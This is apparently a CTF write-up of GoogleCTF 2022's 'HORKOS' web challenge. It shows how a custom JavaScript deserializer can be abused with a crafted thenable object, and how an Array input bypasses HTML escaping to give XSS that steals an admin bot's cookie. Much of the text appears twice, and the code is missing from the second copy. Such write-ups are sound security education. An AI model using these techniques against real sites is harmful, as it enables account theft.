We all heard about insecure deserialization vulnerability and saw many real-world cases in Java, PHP, and other languages.
But, we rarely hear about this vulnerability in JavaScript. I think it's because the built-in serialization/deserialization function JSON.parse and JSON.stringify are only for basic data structures like string, number, array and object.
Class and function are not supported, so there is no way to run malicious code during deserialization.
What if we implement our deserialization logic and support class and function? What could possibly go wrong?
GoogleCTF 2022 has a web challenge called "HORKOS," which shows us the way.
Overview
Before digging into the vulnerability in the challenge, we need to know how it works first.
This challenge is like a shopping website:
After selecting what you want and pressing the "CHECKOUT" button, a request will be sent to POST /order with a JSON string.
Here is what the JSON looks like when I add one tomato to my shopping cart:
That's it, it seems that it's a tiny web application without too many features.
Source code - rendering
Let's see how it works under the hood.
Below is the source code for the core function:
const script = new VMScript(fs.readFileSync('./shoplib.mjs').toString().replaceAll('export ','') + `
sendOrder(cart, orders)
`);
app.post('/order', recaptcha.middleware.verify, async (req,res)=>{
req.setTimeout(1000);
if (req.recaptcha.error && process.env.NODE_ENV != "dev") {
res.writeHead(400, {'Content-Type': 'text/html'});
return await res.end("invalid captcha");
}
if (!req.body.cart) {
res.writeHead(400, {'Content-Type': 'text/html'});
return await res.end("bad request")
}
// TODO: Group orders by zip code
let orders = [];
let cart = req.body.cart;
let vm = new VM({sandbox: {orders, cart}});
let result = await vm.run(script);
orders = new Buffer.from(JSON.stringify(orders)).toString('base64');
let url = '/order#' + orders;
bot.visit(CHALL_URL + url);
res.redirect(url);
});
Our input, req.body.cart is pass to a VM and run sendOrder(cart, orders).
After sendOrder, the orders array will be updated and sent to /order as the parameter. Then, the user will be redirected to the order page, and a bot will also visit the page.
Here is the JavaScript code on the order page:
import * as shop from "/js/shoplib.mjs";
window.onload = () => {
let orders = JSON.parse(atob(location.hash.substr(1)));
console.log(orders);
(orders).forEach((order) => {
const client = new shop.DeliveryClient(order);
document.all.order.innerHTML += client;
})
}
client will be assigned to innerHTML, if we can inject HTML here, we got an XSS that allows us to steal the information(like cookie) of the admin bot.
Below is the related code snippet for rending HTML:
There is a escpaeHtml function to do the sanitization, it encodes all < if < is in the input.
Also, we can see that almost all variables are escaped before rendering to the page, it seems that we have no chance to do something bad?
Not exactly, if you look very carefully.
In function renderLines, this line is different:
<p>${escapeHtml(c.key).toString()}</p>
Why? Because all the other places are escape(something.toString()), cast the input to string then escape, but the one above cast to string "after" escaped.
If you are familiar with JavaScript, besides String.prototype.includes, there is another function with the same name: Array.prototype.includes.
String.prototype.includes checks if the target is in the string while Array.prototype.includes checks if the target is in the array.
For example, ['<p>hello</p>'].includes('<') is false because there no '<' element in the array.
In other words, if c.key is an array, we can bypass the check and rendering <, which caused XSS.
Now, we have already finished the second half of the challenge. All we need to do is to find the solution for the first half: "how do we make c.key an array?"
Source code - generating order data
As I mentioned earlier, the order data is generated by sendOrder function, our goal is to find the vulnerability in its implementation and manipulate the order data.
In Driver.sendOrder, the driver is assigned to the order, and pickle.dumps(order) is pushed to this.orders, which returns to the user and shows on the /order page in the end.
The first thing I noticed is that I can create a function if the type is Function, because globalThis['Function'] is a function constructor.
If I can find a way to run the function, I can get an RCE in the sandbox and manipulate the orders. But I can't find one at the moment.
The second thing I tried is to let key equals to __proto__, so that I can control obj.__proto__.__proto__ which is Object.prototype.__proto__, the prototype of Object.prototype.
But this does not work because it's not allowed. You will get an error like this:
TypeError: Immutable prototype object '#<Object>' cannot have their prototype set
The third thing I came up with is "prototype confusion", look at this part:
pickle.loads always returns an object, so obj[key] is an object. But, if the type is pickledString, its prototype will be String.prototype.
So, we can have a weird object whose prototype is String. We messed up the prototype! But, unfortunately, it's useless in this challenge.
After playing around with the pickle function for hours and finding nothing useful, I decided to take a step back.
The essence of insecure deserialization
The most suspicious part of the challenge is the pickle function, which is responsible for deserializing data. So, I assumed it's a challenge about insecure deserialization.
What is the essence of insecure deserialization? Or put it in another way, what makes deserialization "insecure"?
My answer is: "unexpected object" and "magic function".
For example, when we do the deserialization in the application, it usually is to load our data. The reason why deserialization is a vulnerability is that it can be exploited by loading "unexpected object", like common gadgets in popular libraries.
Also, the "magic function" is important in PHP, like __wakeup, __destruct or __toString and so on. Those magic functions can help the attacker to find the gadget.
Back to the challenge, it's written in JavaScript, what are the magic functions in JavaScript?
toString
valueOf
toJSON
So, based on this new mindset, I rechecked the code to see if I could find somewhere interesting.
Although none of the functions has been called on our deserialized object, I did find an interesting place:
Look at the sendOrder function, it's an async function and it returns this.order.orderId. It means that if this.order.orderId is a Promise, it will be resolved, even without await.
async function test() {
const p = new Promise(resolve => {
console.log('hello')
resolve()
})
return p
}
test()
Paste it to the browser console and run, you will see hello printed in the console.
It's easy to build a serialized Promise, we only need a then function:
async function test() {
var obj = {
then: function(resolve) {
console.log(123)
resolve()
}
}
// we don't even need this actually
obj.__proto__ = Promise.prototype
return obj
}
// we don't need await here
test()
We all heard about insecure deserialization vulnerability and saw many real-world cases in Java, PHP, and other languages.
But, we rarely hear about this vulnerability in JavaScript. I think it's because the built-in serialization/deserialization function
JSON.parse
andJSON.stringify
are only for basic data structures like string, number, array and object.Class and function are not supported, so there is no way to run malicious code during deserialization.
What if we implement our deserialization logic and support class and function? What could possibly go wrong?
GoogleCTF 2022 has a web challenge called "HORKOS," which shows us the way.
Overview
Before digging into the vulnerability in the challenge, we need to know how it works first.
This challenge is like a shopping website:
After selecting what you want and pressing the "CHECKOUT" button, a request will be sent to
POST /order
with a JSON string.Here is what the JSON looks like when I add one tomato to my shopping cart:
After that, the user will be redirected to another
/order
page to see the order:It's worth noting that the URL looks like this:
It's obviously a base64 encoded string. If we decode it, the result is another similar JSON string:
That's it, it seems that it's a tiny web application without too many features.
Source code - rendering
Let's see how it works under the hood.
Below is the source code for the core function:
Our input,
req.body.cart
is pass to a VM and runsendOrder(cart, orders)
.After
sendOrder
, theorders
array will be updated and sent to/order
as the parameter. Then, the user will be redirected to the order page, and a bot will also visit the page.Here is the JavaScript code on the order page:
client
will be assigned toinnerHTML
, if we can inject HTML here, we got an XSS that allows us to steal the information(like cookie) of the admin bot.Below is the related code snippet for rending HTML:
There is a
escpaeHtml
function to do the sanitization, it encodes all<
if<
is in the input.Also, we can see that almost all variables are escaped before rendering to the page, it seems that we have no chance to do something bad?
Not exactly, if you look very carefully.
In function
renderLines
, this line is different:Why? Because all the other places are
escape(something.toString())
, cast the input to string then escape, but the one above cast to string "after" escaped.If you are familiar with JavaScript, besides
String.prototype.includes
, there is another function with the same name:Array.prototype.includes
.String.prototype.includes
checks if the target is in the string whileArray.prototype.includes
checks if the target is in the array.For example,
['<p>hello</p>'].includes('<')
is false because there no'<'
element in the array.In other words, if
c.key
is an array, we can bypass the check and rendering<
, which caused XSS.Now, we have already finished the second half of the challenge. All we need to do is to find the solution for the first half: "how do we make
c.key
an array?"Source code - generating order data
As I mentioned earlier, the order data is generated by
sendOrder
function, our goal is to find the vulnerability in its implementation and manipulate the order data.Below is the related source code:
First,
sendOrder
is called, and our input(value
) is parsed as JSON and then deserialized bypickle.loads
.Then, a new DeliveryService is created and
delivery.sendOrder
is called.In
DeliveryService.sendOrder
, there will be a random driver to send your order, and returnthis.order.orderId
.In
Driver.sendOrder
, the driver is assigned to the order, andpickle.dumps(order)
is pushed tothis.orders
, which returns to the user and shows on the/order
page in the end.How does deserialization works?
In JavaScript, class instance is just an object whose constructor points to the class and
__proto__
points to the prototype of the class.So, it's easy to create an instance of
A
withoutnew
operator:It's basically what
pickle.loads
does, recreate the object and assign the correct prototype according to thetype
key.Trying to mess up prototype
After understanding how it works, my first thought is to mess up the prototype chain to achieve something unexpected.
This part is the most suspicious, in my opinion:
The first thing I noticed is that I can create a function if the type is
Function
, becauseglobalThis['Function']
is a function constructor.If I can find a way to run the function, I can get an RCE in the sandbox and manipulate the orders. But I can't find one at the moment.
The second thing I tried is to let
key
equals to__proto__
, so that I can controlobj.__proto__.__proto__
which isObject.prototype.__proto__
, the prototype ofObject.prototype
.But this does not work because it's not allowed. You will get an error like this:
The third thing I came up with is "prototype confusion", look at this part:
pickle.loads
always returns an object, soobj[key]
is an object. But, if the type ispickledString
, its prototype will beString.prototype
.So, we can have a weird object whose prototype is
String
. We messed up the prototype! But, unfortunately, it's useless in this challenge.After playing around with the pickle function for hours and finding nothing useful, I decided to take a step back.
The essence of insecure deserialization
The most suspicious part of the challenge is the
pickle
function, which is responsible for deserializing data. So, I assumed it's a challenge about insecure deserialization.What is the essence of insecure deserialization? Or put it in another way, what makes deserialization "insecure"?
My answer is: "unexpected object" and "magic function".
For example, when we do the deserialization in the application, it usually is to load our data. The reason why deserialization is a vulnerability is that it can be exploited by loading "unexpected object", like common gadgets in popular libraries.
Also, the "magic function" is important in PHP, like
__wakeup
,__destruct
or__toString
and so on. Those magic functions can help the attacker to find the gadget.Back to the challenge, it's written in JavaScript, what are the magic functions in JavaScript?
toString
valueOf
toJSON
So, based on this new mindset, I rechecked the code to see if I could find somewhere interesting.
Although none of the functions has been called on our deserialized object, I did find an interesting place:
Look at the
sendOrder
function, it's anasync
function and it returnsthis.order.orderId
. It means that ifthis.order.orderId
is aPromise
, it will be resolved, even withoutawait
.Paste it to the browser console and run, you will see
hello
printed in the console.It's easy to build a serialized
Promise
, we only need athen
function:The serialized object looks like this:
arguments[0]
is theresolve
function, we need to call it otherwise the program is hanged.As I mentioned earlier, if we can find a way to run a function, we can push our payload to
orders
.Exploitation
To sum up, we can get the flag by the following steps:
then
function in theorderId
globalThis.orders
to insert our data with XSS payloadBelow is what I use to test and generate the payload:
(BTW, we don't need to insert a new record actually, just modify
orders[0]
to our xss payload. It's easier and also works)Conclusion
This challenge shows us how a simple deserialization function can be abused by crafting a
Promise
with a maliciousthen
function.You can return anything in an
async
function, but if you return aPromise
, it will be resolved first as per the MDN documentation.Thanks Pew for solving the second part and other team members for the great teamwork.